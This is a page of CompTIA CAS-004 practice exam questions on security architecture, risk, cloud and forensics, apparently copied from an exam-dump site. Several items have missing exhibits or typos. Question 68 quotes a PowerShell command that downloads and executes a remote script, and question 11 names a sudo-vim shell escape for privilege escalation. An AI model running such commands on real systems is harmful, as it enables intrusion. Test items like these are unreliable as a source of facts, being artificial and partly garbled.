Improve Your Knowledge with CAS-004 Exam Dumps

Category:

Comments:

0 Comments

Post Date:

May 30, 2023

Practicing with CAS-004 questions can help you identify areas where you need to improve your knowledge. By answering CAS-004 questions and reviewing your responses, you can identify gaps in your understanding and focus your study efforts on those areas. The CAS-004 exam has a strict time limit, and you need to manage your time effectively to answer all the questions. Practicing with CompTIA CAS-004 dumps questions can help you develop time management skills by simulating the exam's time constraints. You'll learn how to pace yourself, manage your time effectively, and ensure that you complete the CAS-004 exam within the allotted time. Test CompTIA CAS-004 exam free dumps below.

Page 1 of 14

1. A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.

Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application?

The company will have access to the latest version to continue development.

The company will be able to force the third-party developer to continue support.

The company will be able to manage the third-party developer’s development process.

The company will be paid by the third-party developer to hire a new development team.

2. An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.

Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

Implement a VPN for all APIs.

Sign the key with DS

Deploy MFA for the service accounts.

Utilize HMAC for the keys.

3. A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements:

Only users with corporate-owned devices can directly access servers hosted by the cloud provider.

The company can control what SaaS applications each individual user can access.

User browser activity can be monitored.

Which of the following solutions would BEST meet these requirements?

IAM gateway, MDM, and reverse proxy

VPN, CASB, and secure web gateway

SSL tunnel, DLP, and host-based firewall

API gateway, UEM, and forward proxy

4. A company is repeatedly being breached by hackers who valid credentials. The company’s Chief information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls.

Which of the following recommendation would MOST likely reduce the risk of unauthorized access?

Implement strict three-factor authentication.

Implement least privilege policies

Switch to one-time or all user authorizations.

Strengthen identify-proofing procedures

5. A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.

Based on this agreement, this finding is BEST categorized as a:

true positive.

true negative.

false positive.

false negative.

6. A security engineer needs to review the configurations of several devices on the network to meet the following requirements:

• The PostgreSQL server must only allow connectivity in the 10.1.2.0/24 subnet.

• The SSH daemon on the database server must be configured to listen to port 4022.

• The SSH daemon must only accept connections from a Single workstation.

• All host-based firewalls must be disabled on all workstations.

• All devices must have the latest updates from within the past eight days.

• All HDDs must be configured to secure data at rest.

• Cleartext services are not allowed.

• All devices must be hardened when possible.

Instructions:

Click on the various workstations and network devices to review the posture assessment results.

Remediate any possible issues or indicate that no issue is found.

Click on Server A to review output data. Select commands in the appropriate tab to remediate connectivity problems to the pOSTGREsql

DATABASE VIA ssh

WAP A

PC A

Laptop A

Switch A

Switch B:

Laptop B

PC B

PC C

Server A

7. A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.

Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?

Scan the code with a static code analyzer, change privileged user passwords, and provide security training.

Change privileged usernames, review the OS logs, and deploy hardware tokens.

Implement MFA, review the application logs, and deploy a WA

Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.

8. A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.

Which of the following technologies would BEST meet this need?

Faraday cage

WPA2 PSK

WPA3 SAE

WEP 128 bit

9. A company wants to improve Its active protection capabilities against unknown and zero-day malware.

Which of the following Is the MOST secure solution?

NIDS

Application allow list

Sandbox detonation

Endpoint log collection

HIDS

10. An organization does not have visibility into when company-owned assets are off network or not connected via a VPN. The lack of visibility prevents the organization from meeting security and operational objectives.

Which of the following cloud-hosted solutions should the organization implement to help mitigate the risk?

Antivirus

UEBA

EDR

HIDS

Page 2 of 14

11. During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels.

Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?

Spawn a shell using sudo and an escape string such as sudo vim -c ‘!sh’.

Perform ASIC password cracking on the host.

Read the /etc/passwd file to extract the usernames.

Initiate unquoted service path exploits.

Use the UNION operator to extract the database schema.

12. A security analyst has been provided the following partial Snort IDS rule to review and add into the company's Snort IDS to identify a CVE:

Which of the following should the analyst recommend to mitigate this type of vulnerability?

IPSec rules

OS patching

Two-factor authentication

TCP wrappers

13. A company is deploying multiple VPNs to support supplier connections into its extranet applications.

The network security standard requires:

• All remote devices to have up-to-date antivirus

• An up-to-date and patched OS

Which of the following technologies should the company deploy to meet its security objectives? (Select TWO)

NAC

WAF

NIDS

Reverse proxy

NGFW

Bastion host

14. Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours.

Based on RPO requirements, which of the following recommendations should the management team make?

Leave the current backup schedule intact and pay the ransom to decrypt the data.

Leave the current backup schedule intact and make the human resources fileshare read-only.

Increase the frequency of backups and create SIEM alerts for IOCs.

Decrease the frequency of backups and pay the ransom to decrypt the data.

15. A company was recently infected by malware. During the root cause analysis. the company determined that several users were installing their own applications. TO prevent further compromises, the company has decided it will only allow authorized applications to run on its systems.

Which Of the following should the company implement?

Signing

Access control

HIPS

Permit listing

16. Based on PCI DSS v3.4, One Particular database field can store data, but the data must be unreadable.

Which of the following data objects meets this requirement?

PAN

CVV2

Cardholder name

expiration date

17. An organization recently started processing, transmitting, and storing its customers’ credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.

Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

NIST

GDPR

PCI DSS

ISO

18. A small bank is evaluating different methods to address and resolve the following requirements

" Must be able to store credit card data using the smallest amount of data possible

• Must be compliant with PCI DSS

• Must maintain confidentiality if one piece of the layer is compromised

Which of the following is the best solution for the bank?

Scrubbing

Tokenization

Masking

Homomorphic encryption

19. An organization wants to perform a scan of all its systems against best practice security configurations.

Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for fill automation? (Choose two.)

ARF

XCCDF

CPE

CVE

CVSS

OVAL

20. Which of the following is a benefit of using steganalysis techniques in forensic response?

Breaking a symmetric cipher used in secure voice communications

Determining the frequency of unique attacks against DRM-protected media

Maintaining chain of custody for acquired evidence

Identifying least significant bit encoding of data in a .wav file

Page 3 of 14

21. A company is looking at sending historical backups containing customer PII to a cloud service provider to save on storage costs.

Which of the following is the MOST important consideration before making this decision?

Availability

Data sovereignty

Geography

Vendor lock-in

22. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective.

Which of the following risk mitigation techniques should the analyst use?

Update the incident response plan.

Blocklist the executable.

Deploy a honeypot onto the laptops.

Detonate in a sandbox.

23. An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.

Which of the following describes the administrator’s discovery?

A vulnerability

A threat

A breach

A risk

24. A client is adding scope to a project.

Which of the following processes should be used when requesting updates or corrections to the client's systems?

The implementation engineer requests direct approval from the systems engineer and the Chief Information Security Officer.

The change control board must review and approve a submission.

The information system security officer provides the systems engineer with the system updates.

The security engineer asks the project manager to review the updates for the client's system.

25. A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors.

Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?

Implement iterative software releases.

Revise the scope of the project to use a waterfall approach

Change the scope of the project to use the spiral development methodology.

Perform continuous integration.

26. A software company is developing an application in which data must be encrypted with a cipher that requires the following:

* Initialization vector

* Low latency

* Suitable for streaming

Which of the following ciphers should the company use?

Cipher feedback

Cipher block chaining message authentication code

Cipher block chaining

Electronic codebook

27. A cyberanalyst has been tasked with recovering PDF files from a provided image file.

Which of the following is the best file-carving tool for PDF recovery?

objdump

Strings

Foremost

28. A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM an downloaded the image to a secured USB drive to share with the government.

Which of the following should be taken into consideration during the process of releasing the drive to the government?

Encryption in transit

Legal issues

Chain of custody

Order of volatility

Key exchange

29. DRAG DROP

An organization is planning for disaster recovery and continuity of operations.

INSTRUCTIONS

Review the following scenarios and instructions. Match each relevant finding to the affected host. After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.

Each finding may be used more than once.

If at any time you would like to bring back the initial state of the simul-ation, please click the Reset All button.

30. A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by re reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust.

To support users’ trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

+ Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Quick UDP internet connection

OCSP stapling

Private CA

DNSSEC

CRL

HSTS

Distributed object model

Page 4 of 14

31. in a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response?

Risk transfer

Risk mitigation

Risk acceptance

Risk avoidance

32. A security engineer notices the company website allows users following example:

hitps://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

SQL injection

Remote file inclusion

Directory traversal -

Unsecure references

33. During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. upon rebooting the machine, a malicious script that

was running as a background process was no longer present. As a result, potentially useful evidence was lost.

Which of the following should the security analyst have followed?

Order of volatility

Chain of custody

Verification

Secure storage

34. The Chief Information Security Officer is concerned about the possibility of employees downloading ‘malicious files from the internet and ‘opening them on corporate workstations.

Which of the following solutions would be BEST to reduce this risk?

Integrate the web proxy with threat intelligence feeds.

Scan all downloads using an antivirus engine on the web proxy.

Block known malware sites on the web proxy.

Execute the files in the sandbox on the web proxy.

35. While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.

Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?

Pay the ransom within 48 hours.

Isolate the servers to prevent the spread.

Notify law enforcement.

Request that the affected servers be restored immediately.

36. The goal of a Chief information Security Officer (CISO) providing up-to-date metrics to a bank’s risk committee is to ensure:

Budgeting for cybersecurity increases year over year.

The committee knows how much work is being done.

Business units are responsible for their own mitigation.

The bank is aware of the status of cybersecurity risks

37. A consultant needs access to a customer's cloud environment.

The customer wants to enforce the following engagement requirements:

• All customer data must remain under the control of the customer at all times.

• Third-party access to the customer environment must be controlled by the customer.

• Authentication credentials and access control must be under the customer's control.

Which of the following should the consultant do to ensure all customer requirements are satisfied when accessing the cloud environment?

use the customer's SSO with read-only credentials and share data using the customer's provisioned secure network storage

use the customer-provided VDI solution to perform work on the customer's environment.

Provide code snippets to the customer and have the customer run code and securely deliver its output

Request API credentials from the customer and only use API calls to access the customer's environment.

38. A user in the finance department uses a laptop to store a spreadsheet that contains confidential financial information for the company.

Which of the following would be the best way to protect the file while the user brings the laptop between locations? (Select two).

Encrypt the hard drive with full disk encryption.

Back up the file to an encrypted flash drive.

Place an ACL on the file to only allow access to specified users.

Store the file in the user profile.

Place an ACL on the file to deny access to everyone.

Enable access logging on the file.

39. Application owners are reporting performance issues with traffic using port 1433 from the cloud environment. A security administrator has various pcap files to analyze the data between the related source and destination servers.

Which of the following tools should be used to help troubleshoot the issue?

Fuzz testing

Wireless vulnerability scan

Exploit framework

Password cracker

Protocol analyzer

40. A customer reports being unable to connect to a website at www.test.com to consume services.

The customer notices the web application has the following published cipher suite:

Which of the following is the MOST likely cause of the customer’s inability to connect?

Weak ciphers are being used.

The public key should be using ECDS

The default should be on port 80.

The server name should be test.com.

Page 5 of 14

41. The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties.

Which of the following should be implemented to BEST manage the risk?

Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.

Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.

Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.

Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier’s rating. Report finding units that rely on the suppliers and the various risk teams.

42. After a server was compromised an incident responder looks at log files to determine the attack vector that was used.

The incident responder reviews the web server log files from the time before an unexpected SSH session began:

Which of the following is the most likely vulnerability that was exploited based on the log files?

Directory traversal revealed the hashed SSH password, which was used to access the server.

A SQL injection was used during the ordering process to compromise the database server

The root password was easily guessed and used as a parameter lo open a reverse shell

An outdated third-party PHP plug-in was vulnerable to a known remote code execution

43. A security is assisting the marketing department with ensuring the security of the organization’s social media platforms.

The two main concerns are:

The Chief marketing officer (CMO) email is being used department wide as the username

The password has been shared within the department

Which of the following controls would be BEST for the analyst to recommend?

Configure MFA for all users to decrease their reliance on other authentication.

Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.

Create multiple social media accounts for all marketing user to separate their actions.

Ensue the password being shared is sufficiently and not written down anywhere.

44. A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis.

A security engineer is concerned about the security of the solution and notes the following.

* The critical devise send cleartext logs to the aggregator.

* The log aggregator utilize full disk encryption.

* The log aggregator sends to the analysis server via port 80.

* MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely.

* The data is compressed and encrypted prior to being achieved in the cloud.

Which of the following should be the engineer’s GREATEST concern?

Hardware vulnerabilities introduced by the log aggregate server

Network bridging from a remote access VPN

Encryption of data in transit

Multinancy and data remnants in the cloud

45. A security analyst is reviewing the following vulnerability assessment report:

Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?

Server1

Server2

Server 3

Servers

46. An enterprise is undergoing an audit to review change management activities when promoting code to production.

The audit reveals the following:

• Some developers can directly publish code to the production environment.

• Static code reviews are performed adequately.

• Vulnerability scanning occurs on a regularly scheduled basis per policy.

Which of the following should be noted as a recommendation within the audit report?

Implement short maintenance windows.

Perform periodic account reviews.

Implement job rotation.

Improve separation of duties.

47. Which of the following are risks associated with vendor lock-in? (Choose two.)

The client can seamlessly move data.

The vendor can change product offerings.

The client receives a sufficient level of service.

The client experiences decreased quality of service.

The client can leverage a multicloud approach.

The client experiences increased interoperability.

48. A security analyst is using data provided from a recent penetration test to calculate CVSS scores to prioritize remediation.

Which of the following metric groups would the analyst need to determine to get the overall scores? (Select THREE).

Temporal

Availability

Integrity

Confidentiality

Base

Environmental

Impact

Attack vector

49. A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.

Which of the following would BEST secure the company’s CI/CD pipeline?

Utilizing a trusted secrets manager

Performing DAST on a weekly basis

Introducing the use of container orchestration

Deploying instance tagging

50. A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss.

Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

Segment the systems to reduce the attack surface if an attack occurs

Migrate the services to new systems with a supported and patched O

Patch the systems to the latest versions of the existing OSs

Install anti-malware. HIPS, and host-based firewalls on each of the systems

Page 6 of 14

51. Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.

Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?

Drive wiping

Degaussing

Purging

Physical destruction

52. A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC.

The following query behavior was captured:

Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

A) Personal health information: Inform the human resources department of the breach and review the DLP logs.

В) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.

C) Customer IDs: Inform the customer service department of the breach and work to change the

account numbers.

D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

Option A

Option B

Option C

Option D

53. An organization recently recovered from an attack that featured an adversary injecting Malicious logic into OS bootloaders on endpoint devices Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the IJEFI through the full loading of OS components. of the following TPM structures enables this storage functionality?

Endorsement tickets

Clock/counter structures

Command tag structures with MAC schemes

Platform configuration registers

54. A user forwarded a suspicious email to a security analyst for review. The analyst examined the email and found that neither the URL nor the attachment showed any indication of malicious activities.

Which of the following intelligence collection methods should the analyst use to confirm the legitimacy of the email?

HUMINT

UEBA

OSINT

RACE

55. An organization is running its e-commerce site in the cloud. The capacity is sufficient to meet the organization's needs throughout most of the year, except during the holidays when the organization plans to introduce a new line of products and expects an increase in traffic. The organization is not sure how well its products will be received.

To address this issue, the organization needs to ensure that:

* System capacity is optimized.

* Cost is reduced.

Which of the following should be implemented to address these requirements? (Select TWO).

Containerization

Load balancer

Microsegmentation

Autoscaling

CDN

WAF

56. A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.

Which of the following techniques will MOST likely meet the business’s needs?

Performing deep-packet inspection of all digital audio files

Adding identifying filesystem metadata to the digital audio files

Implementing steganography

Purchasing and installing a DRM suite

57. A security architect recommends replacing the company’s monolithic software application with a containerized solution. Historically, secrets have been stored in the application's configuration files.

Which of the following changes should the security architect make in the new system?

Use a secrets management tool.

‘Save secrets in key escrow.

Store the secrets inside the Dockerfiles.

Run all Dockerfles in a randomized namespace.

58. A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.

Which of the following sources could the architect consult to address this security concern?

SDLC

OVAL

IEEE

OWASP

59. A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise.

Which of the following should the organization do to BEST take advantage of this solution?

Develop an Nmap plug-in to detect the indicator of compromise.

Update the organization's group policy.

Include the signature in the vulnerability scanning tool.

Deliver an updated threat signature throughout the EDR system

60. A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered data. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.

Which of the following would MOST likely help the company gain consensus to move the data to the cloud?

Designing data protection schemes to mitigate the risk of loss due to multitenancy

Implementing redundant stores and services across diverse CSPs for high availability

Emulating OS and hardware architectures to blur operations from CSP view

Purchasing managed FIM services to alert on detected modifications to covered data

Page 7 of 14

61. An auditor Is reviewing the logs from a web application to determine the source of an Incident. The web application architecture Includes an Internet-accessible application load balancer, a number of web servers In a private subnet, application servers, and one database server In a tiered configuration. The application load balancer cannot store the logs.

The following are sample log snippets:

Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources?

Enable the x-Forwarded-For header al the load balancer.

Install a software-based HIDS on the application servers.

Install a certificate signed by a trusted C

Use stored procedures on the database server.

Store the value of the $_server ( ‘ REMOTE_ADDR ' ] received by the web servers.

62. A company with multiple locations has taken a cloud-only approach to its infrastructure The company does not have standard vendors or systems resulting in a mix of various solutions put in place by each location The Chief Information Security Officer wants to ensure that the internal security team has visibility into all platforms.

Which of the following best meets this objective?

Security information and event management

Cloud security posture management

SNMFV2 monitoring and log aggregation

Managed detection and response services from a third party

63. A security architect is reviewing the following proposed corporate firewall architecture and configuration:

Both firewalls are stateful and provide Layer 7 filtering and routing.

The company has the following requirements:

Web servers must receive all updates via HTTP/S from the corporate network.

Web servers should not initiate communication with the Internet.

Web servers should only connect to preapproved corporate database servers.

Employees’ computing devices should only connect to web services over ports 80 and 443.

Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

64. A security engineer is hardening a company’s multihomed SFTP server.

When scanning a public-facing network interface, the engineer finds the following ports are open:

22

25

110

137

138

139

445

Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company’s distribution process.

Which of the following would be the BEST solution to harden the system?

Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.

Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.

Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface.

Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.

65. An organization’s assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.

Given this information, which of the following is a noted risk?

Feature delay due to extended software development cycles

Financial liability from a vendor data breach

Technical impact to the API configuration

The possibility of the vendor’s business ceasing operations

66. A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.

Which of the following encryption methods should the cloud security engineer select during the implementation phase?

Instance-based

Storage-based

Proxy-based

Array controller-based

67. During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place.

Which of the following Is the MOST likely solution?

A WAF to protect web traffic

User and entity behavior analytics

Requirements to change the local password

A gap analysis

68. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Antivirus and UEBA

Reverse proxy and sandbox

EDR and application approved list

Forward proxy and MFA

69. An organization is designing a MAC scheme (or critical servers running GNU/Linux. The security engineer is investigating SELinux but is confused about how to read labeling contexts.

The engineer executes the command stat ./secretfile and receives the following output:

Which of the following describes the correct order of labels shown in the output above?

Role, type MLS level, and user identity

Role, user identity, object, and MLS level

Object MLS level, role, and type

User identity, role, type, and MLS level

Object, user identity, role, and MLS level

70. A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.

Which of the following should the security administrator do to mitigate the risk?

Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.

Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.

Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash.

Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

Page 8 of 14

71. Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Select TWO).

proxy

Tunneling

VDI

MDM

RDP

MAC address randomization

72. A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.

Which of the following would be the BEST solution against this type of attack?

Wildcard certificates

HSTS

Certificate pinning

73. Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

E-discovery

Review analysis

Information governance

Chain of custody

74. A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.

Which of the following is the MOST likely cause?

The user agent client is not compatible with the WA

A certificate on the WAF is expired.

HTTP traffic is not forwarding to HTTPS to decrypt.

Old, vulnerable cipher suites are still being used.

75. A security analyst at a global financial firm was reviewing the design of a cloud-based system to identify opportunities to improve the security of the architecture. The system was recently involved in a data breach after a vulnerability was exploited within a virtual machine's operating system. The analyst observed the VPC in which the system was located was not peered with the security VPC that contained the centralized vulnerability scanner due to the cloud provider's limitations.

Which of the following is the BEST course of action to help prevent this situation m the near future?

Establish cross-account trusts to connect all VPCs via API for secure configuration scanning.

Migrate the system to another larger, top-tier cloud provider and leverage the additional VPC peering flexibility.

Implement a centralized network gateway to bridge network traffic between all VPCs.

Enable VPC traffic mirroring for all VPCs and aggregate the data for threat detection.

76. A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative, the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online.

Which of the following be the FIRST step taken by the team?

Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.

Create an SLA for each application that states when the application will come back online and distribute this information to the business units.

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.

77. In comparison with traditional on-premises infrastructure configurations, defining ACLs in a CSP relies on:

cloud-native applications.

containerization.

serverless configurations.

software-defined netWorking.

secure access service edge.

78. Documents downloaded from websites must be scanned for malware.

Which of the following solutions should the network architect implement to meet the requirements?

Reverse proxy, stateful firewalls, and VPNs at the local sites

IDSs, WAFs, and forward proxy IDS

DoS protection at the hub site, mutual certificate authentication, and cloud proxy

IPSs at the hub, Layer 4 firewalls, and DLP

79. A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources.

Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?

Union filesystem overlay

Cgroups

Linux namespaces

Device mapper

80. A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead and be resistant to offline password attacks.

Which of the following should the security consultant recommend?

WPA2-Preshared Key

WPA3-Enterprise

WPA3-Personal

WPA2-Enterprise

Page 9 of 14

81. Users are claiming that a web server is not accessible. A security engineer logs for the site.

The engineer connects to the server and runs netstat -an and receives the following output:

Which of the following is MOST likely happening to the server?

Port scanning

ARP spoofing

Buffer overflow

Denial of service

82. Law enforcement officials informed an organization that an investigation has begun.

Which of the following is the FIRST step the organization should take?

Initiate a legal hold.

Refer to the retention policy

Perform e-discovery.

Review the subpoena

83. A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops.

The company would like to prioritize defenses against the following attack scenarios:

Unauthorized insertions into application development environments Authorized insiders making unauthorized changes to environment configurations

Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)

Perform static code analysis of committed code and generate summary reports.

Implement an XML gateway and monitor for policy violations.

Monitor dependency management tools and report on susceptible third-party libraries.

Install an IDS on the development subnet and passively monitor for vulnerable services.

Model user behavior and monitor for deviations from normal.

Continuously monitor code commits to repositories and generate summary logs.

84. After a cybersecurity incident, a judge found that a company did not conduct a proper forensic investigation. The company was ordered to pay penalties.

Which of the following forensic steps would be best to prevent this from happening again?

Evidence preservation

Evidence verification

Evidence collection

Evidence analysis

85. A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

Deploy SOAR utilities and runbooks.

Replace the associated hardware.

Provide the contractors with direct access to satellite telemetry data.

Reduce link latency on the affected ground and satellite segments.

86. An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party.

Which of the following would BEST accomplish this goal?

Properly configure a secure file transfer system to ensure file integrity.

Have the external parties sign non-disclosure agreements before sending any images.

Only share images with external parties that have worked with the firm previously.

Utilize watermarks in the images that are specific to each external party.

87. A company wants to improve the security of its web applications that are running on in-house servers.

A risk assessment has been performed and the following capabilities are desired:

• Terminate SSL connections at a central location

• Manage both authentication and authorization for incoming and outgoing web service calls

• Advertise the web service API

• Implement DLP and anti-malware features

Which of the following technologies will be the BEST option?

WAF

XML gateway

ESB gateway

API gateway

88. A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:

As part of the image process, which of the following is the FIRST step the analyst should take?

Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts

Validate the final "Received" header against the DNS entry of the domain.

Compare the 'Return-Path" and "Received" fields.

Ignore the emails, as SPF validation is successful, and it is a false positive

89. A security analyst is reviewing a new IOC in which data is injected into an online process.

The IOC shows the data injection could happen in the following ways:

• Five numerical digits followed by a dash, followed by four numerical digits; or

• Five numerical digits

When one of these IOCs is identified, the online process stops working.

Which of the following regular expressions should be implemented in the NIPS?

^d{4}(-d{5})?$

^d{5}(-d{4})?$

^d{5-4}$

^d{9}$

90. A security analyst notices a number of SIEM events that show the following activity:

Which of the following response actions should the analyst take FIRST?

